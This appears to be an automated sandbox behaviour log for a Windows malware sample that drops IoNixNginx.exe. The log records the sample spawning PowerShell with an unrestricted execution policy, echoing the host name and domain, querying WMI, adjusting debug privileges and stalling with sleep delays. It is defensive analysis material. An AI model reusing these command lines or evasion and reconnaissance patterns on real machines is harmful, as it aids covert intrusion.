Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened / queried: C:\Windows\System32\DriverStore\FileRepository\vmci.inf_amd64_68ed49469341f563Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6828Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 479Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6293
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3535
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1395
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 631
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 901
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1633
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 530
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1414
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 556
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6850
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2880
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7058
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2669
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3120
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 891
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2114
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2030
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1668
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1342
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\libGLESv2.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\libEGL.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\nsis7z.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\resources\elevate.exeJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\d3dcompiler_47.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\System.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vulkan-1.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\vk_swiftshader.dllJump to dropped file
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nslCD8A.tmp\7z-out\d3dcompiler_47.dllJump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5456Thread sleep count: 6828 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1860Thread sleep count: 479 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4116Thread sleep time: -3689348814741908s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5248Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1988Thread sleep count: 6293 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6792Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6204Thread sleep count: 268 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2384Thread sleep count: 3535 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3944Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2156Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6084Thread sleep count: 1395 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6180Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1876Thread sleep count: 631 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7284Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7132Thread sleep count: 901 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2012Thread sleep count: 1633 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7356Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7180Thread sleep count: 530 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7352Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep count: 1414 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7360Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep count: 556 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7344Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7624Thread sleep count: 6850 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7628Thread sleep count: 2880 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7656Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7752Thread sleep count: 7058 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep count: 2669 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4268Thread sleep count: 3120 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6676Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1416Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5788Thread sleep count: 891 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4472Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6220Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 432Thread sleep count: 2114 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 968Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1548Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3696Thread sleep count: 2030 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4500Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6636Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4188Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6620Thread sleep count: 1668 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5736Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4480Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep count: 1342 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2192Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\d0010809Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
Source: C:\Users\user\Desktop\AyqwnIUrcz.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened: C:\Users\user~1\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened: C:\Users\user~1\AppData\LocalJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\resourcesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened: C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened: C:\Users\user~1\AppData\Local\TempJump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeFile opened: C:\Users\user~1Jump to behavior
Source: IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: VMware Fusion 4 has corrupt rendering with Win Vista+
Source: IoNixNginx.exe, 00000010.00000000.1675720568.00007FF7974A5000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: VMware can crash with older drivers and WebGL content
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "chcp"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe "C:\Users\user~1\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\hgekorcpiasneymc" --mojo-platform-channel-handle=2184 --field-trial-handle=1860,i,9328495160301710752,8818608180410504784,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\2pvtPES5t7aoV3eXnWrywytFi10\IoNixNginx.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -Jump to behavior
